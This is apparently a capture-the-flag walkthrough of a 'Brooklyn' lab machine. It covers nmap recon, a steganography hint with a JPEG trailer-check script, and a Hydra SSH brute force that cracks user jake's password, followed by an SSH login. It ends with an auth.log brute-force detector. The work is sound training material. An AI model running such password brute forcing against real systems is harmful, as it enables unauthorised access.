Create a directory for the machine on the Desktop, and a directory to hold the nmap scans.
Task 2 - Reconnaissance
# Add the target to /etc/hosts (use tee: with "sudo echo ... >> /etc/hosts" the
# redirection is done by the unprivileged shell and fails with Permission denied)
echo "10.10.218.233 brooklyn.thm" | sudo tee -a /etc/hosts
mkdir -p thm/brooklyn.thm
cd thm/brooklyn.thm

# At the end of the room
# To clean up the last line from the /etc/hosts file
sudo sed -i '$ d' /etc/hosts
I prefer to start recon by pinging the target; this checks connectivity and gives a first hint about the OS.
Sending three ICMP echo requests, we see a Time To Live (TTL) of about 64. TTL is a hop count, not a time in seconds: each router on the path decrements it by one, and Linux/Unix hosts send with an initial TTL of 64 while Windows hosts use 128. A value at or just below 64 therefore points to a *nix system (probably Linux).
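As an added example (my code, not part of the original writeup), a small helper that pulls the TTL out of ping output and turns it into an OS guess plus an estimated hop count. The ping output below is constructed, since the writeup does not show it, and the initial-TTL table reflects common vendor defaults, which an administrator can change, so treat the result as a hint to be confirmed by nmap.

```python
import re
from typing import List, Tuple

# Initial TTL values commonly used by OS families (assumption: vendor
# defaults; an administrator can change them, so treat this as a hint).
INITIAL_TTLS = {
    64: "Linux/Unix (also BSD, macOS, Android)",
    128: "Windows",
    255: "Solaris/AIX or a network device (Cisco IOS)",
}

# Linux ping prints "ttl=63", Windows ping prints "TTL=128".
TTL_RE = re.compile(r"\bttl=(\d+)", re.IGNORECASE)


def extract_ttls(ping_output: str) -> List[int]:
    """Return every TTL value found in the text of a ping run."""
    return [int(m.group(1)) for m in TTL_RE.finditer(ping_output)]


def guess_os(observed_ttl: int) -> Tuple[str, int]:
    """Map an observed TTL to (OS family guess, estimated hops to target).

    Every router on the path decrements the TTL by one, so the observed
    value is the target's initial TTL minus the hop count.  Pick the
    smallest common initial TTL that is >= the observed value.
    """
    for initial in sorted(INITIAL_TTLS):
        if observed_ttl <= initial:
            return INITIAL_TTLS[initial], initial - observed_ttl
    return "unknown (TTL above 255 is invalid)", 0


def guess_from_ping(ping_output: str) -> Tuple[str, int]:
    """Convenience wrapper: use the most common TTL seen in the output."""
    ttls = extract_ttls(ping_output)
    if not ttls:
        raise ValueError("no TTL values in ping output (host down or filtered?)")
    return guess_os(max(set(ttls), key=ttls.count))


# Constructed sample (the original writeup does not show the ping output):
# one VPN hop between us and the target, so 64 - 1 = 63.
SAMPLE_PING = """\
PING brooklyn.thm (10.10.218.233) 56(84) bytes of data.
64 bytes from brooklyn.thm (10.10.218.233): icmp_seq=1 ttl=63 time=73.2 ms
64 bytes from brooklyn.thm (10.10.218.233): icmp_seq=2 ttl=63 time=72.8 ms
64 bytes from brooklyn.thm (10.10.218.233): icmp_seq=3 ttl=63 time=73.0 ms
"""

if __name__ == "__main__":
    os_guess, hops = guess_from_ping(SAMPLE_PING)
    print(f"OS guess: {os_guess}, about {hops} hop(s) away")
```

Pipe real output in with something like `ping -c 3 brooklyn.thm | python3 ttl_guess.py` after replacing the sample with `sys.stdin.read()`; the hop estimate is the part worth keeping, because a TTL of 63 on a one-hop VPN is the same Linux box as a TTL of 55 seen from across the internet.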
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-23 16:08 EDT
Nmap scan report for brooklyn.thm (10.10.218.233)
Host is up (0.073s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.80.228
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We found a useful piece of information (ftp-anon: Anonymous FTP login allowed (FTP code 230)), but first let's check port 80.
Inspecting the page source, we find this comment:
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body, html {
  height: 100%;
  margin: 0;
}
.bg {
  /* The image used */
  background-image: url("brooklyn99.jpg");
  /* Full height */
  height: 100%;
  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}
</style>
</head>
<body>
<div class="bg"></div>
<p>This example creates a full page background image. Try to resize the browser window to see how it always will cover the full screen (when scrolled to top), and that it scales nicely on all screen sizes.</p>
<!-- Have you ever heard of steganography? -->
</body>
</html>
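The comment points at brooklyn99.jpg, the background image referenced in the CSS. As an added example (my code, not from the room or the original writeup), here is the quick triage step I run before reaching for a stego tool: check whether anything is appended after the JPEG End-Of-Image marker, which is the crude "cat payload >> image.jpg" form of hiding. The sample bytes are constructed (a JPEG skeleton, not a decodable picture) and the magic-number table is an assumption. The caveat matters: tools like steghide embed data inside the JPEG's coefficient data, so an empty trailer does not rule out steganography, it only rules out the lazy variant.

```python
import sys
from typing import Dict

SOI = b"\xff\xd8"  # Start Of Image
EOI = b"\xff\xd9"  # End Of Image

# Assumed magic-number table for classifying whatever was appended.
MAGICS: Dict[bytes, str] = {
    b"PK\x03\x04": "zip archive",
    b"\x1f\x8b": "gzip",
    b"\x89PNG": "PNG image",
    b"%PDF": "PDF",
    b"Rar!": "rar archive",
}


def trailing_data(jpeg: bytes) -> bytes:
    """Return whatever follows the final JPEG End-Of-Image marker.

    Inside entropy-coded scan data a 0xFF byte is always followed by 0x00
    (byte stuffing) or by an RSTn marker, so FF D9 cannot occur there.
    EXIF thumbnails carry their own EOI, which is why the *last* FF D9 is
    taken as the real end of the picture.
    """
    if not jpeg.startswith(SOI):
        raise ValueError("not a JPEG (missing SOI marker)")
    eoi = jpeg.rfind(EOI)
    if eoi == -1:
        raise ValueError("truncated JPEG (no EOI marker)")
    return jpeg[eoi + len(EOI):]


def describe_trailer(data: bytes) -> str:
    """Rough classification of appended bytes by magic number."""
    for magic, name in MAGICS.items():
        if data.startswith(magic):
            return name
    return "unknown/plain data"


# Constructed samples: APP0 (JFIF) segment, a tiny SOS segment with one
# stuffed FF 00 pair in the scan data, then EOI.  Not a viewable image.
SAMPLE_CLEAN = (
    SOI
    + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
    + b"\x12\x34\xff\x00\x56"
    + EOI
)
SAMPLE_STUFFED = SAMPLE_CLEAN + b"PK\x03\x04hidden-zip-payload"


if __name__ == "__main__":
    # Usage: python3 jpeg_trailer.py brooklyn99.jpg
    with open(sys.argv[1], "rb") as f:
        extra = trailing_data(f.read())
    if extra:
        print(f"{len(extra)} trailing bytes after EOI: {describe_trailer(extra)}")
    else:
        print("no trailing data after EOI (try steghide/stegseek next)")
```

If the trailer is non-empty, `dd` it out by offset or just point `binwalk -e` at the file; if it is empty, move on to steghide-style extraction, which this check cannot see.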
Brute-forcing the SSH password for the user jake with Hydra and a large wordlist gives:
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-24 05:56:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://brooklyn.thm:22/
[22][ssh] host: brooklyn.thm   login: jake   password: 987654321
jake::987654321
We can use the credentials obtained for SSH access:
ssh jake@brooklyn.thm
jake@brooklyn.thm's password:
Last login: Tue May 26 08:56:58 2020
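What this brute force looks like from the target's side, as an added example that is not part of the original writeup: OpenSSH logs every failed attempt to /var/log/auth.log on Ubuntu, so a few seconds of Hydra at 16 parallel tasks leaves a burst of "Failed password" lines from one source address, followed by an "Accepted password" once it hits. The log lines below are constructed (the source address is the attacker address visible in the ftp-syst output above, the hostname and PIDs are made up), and the threshold and window values are assumptions; the sliding-window count is the same idea fail2ban applies before banning the source.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# sshd line formats as written to /var/log/auth.log by OpenSSH on Ubuntu.
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)
OK_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted password for (?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_ts(ts: str, year: int = 2023) -> datetime:
    """syslog timestamps carry no year; the caller supplies one (assumed 2023)."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(
    lines: List[str], threshold: int = 10, window_seconds: int = 60
) -> List[Tuple[str, str, int, bool]]:
    """Return (ip, user, total_failures, success_seen) for every source that
    produced >= `threshold` failed logins inside any `window_seconds` span.

    success_seen is True when the same ip/user pair later got an
    "Accepted password", i.e. the guess worked, which is the alert that
    should page someone rather than just get counted.
    """
    failures: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    successes = set()
    for line in lines:
        m = FAIL_RE.match(line)
        if m:
            failures[(m["ip"], m["user"])].append(parse_ts(m["ts"]))
            continue
        m = OK_RE.match(line)
        if m:
            successes.add((m["ip"], m["user"]))

    alerts = []
    for (ip, user), times in failures.items():
        times.sort()
        # Sliding window: largest number of failures inside window_seconds.
        best = lo = 0
        for hi in range(len(times)):
            while (times[hi] - times[lo]).total_seconds() > window_seconds:
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= threshold:
            alerts.append((ip, user, len(times), (ip, user) in successes))
    return alerts


# Constructed sample log: 12 failures for jake in 12 seconds from the
# attacking host, then the successful login, plus one unrelated failure.
SAMPLE_LOG = [
    f"Jun 24 05:56:{s:02d} brooklyn sshd[{1200 + s}]: Failed password for jake "
    f"from 10.9.80.228 port {40000 + s} ssh2"
    for s in range(1, 13)
] + [
    "Jun 24 05:56:14 brooklyn sshd[1213]: Accepted password for jake from 10.9.80.228 port 40013 ssh2",
    "Jun 24 05:57:30 brooklyn sshd[1300]: Failed password for invalid user admin from 10.9.80.50 port 51000 ssh2",
]

if __name__ == "__main__":
    for ip, user, count, got_in in detect_bruteforce(SAMPLE_LOG):
        print(f"{ip} -> {user}: {count} failures, login succeeded: {got_in}")
```

Run it against a real file with `detect_bruteforce(open("/var/log/auth.log").readlines())`; the `-t 4` warning Hydra printed above exists because sshd's MaxStartups throttles unauthenticated connections, so on a hardened host the same attack shows up as connection drops rather than password failures.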